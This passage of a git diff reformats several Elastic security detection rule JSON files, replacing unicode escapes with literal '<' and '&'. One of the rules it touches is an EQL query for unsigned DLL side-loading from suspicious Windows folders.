a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json index 89841230f60..7ffcdc9d578 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_106.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json index f83fddd080f..0b865d8f3ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_107.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json index ce61fc2c231..145632c6412 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_108.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json index edc281842a3..a950e2c7564 100644 --- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json index 9a2a8e533ec..961eea0caeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json +++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_2.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json index e5288b4f8f8..0a0a25eef6a 100644 --- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json +++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_3.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json index f1d32cff6b1..c225001e019 100644 --- a/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json +++ b/packages/security_detection_engine/kibana/security_rule/c9482bfa-a553-4226-8ea2-4959bd4f7923_4.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json index 82d989ccfd8..6954cdb1e4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json +++ b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json index 3c833ec39af..789fe45e3a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json index 33aaf8a9c06..5a03b124ee0 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json index 5b9f0a9ea42..1827476c498 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json index 9bcb9d251c7..0d9d7a7e9e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_2.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", "related_integrations": [ { "package": "endpoint", @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json index 52e3a421466..f8f558ed2fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_3.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Unsigned DLL Side-Loading from a Suspicious Folder", "note": "", - "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n 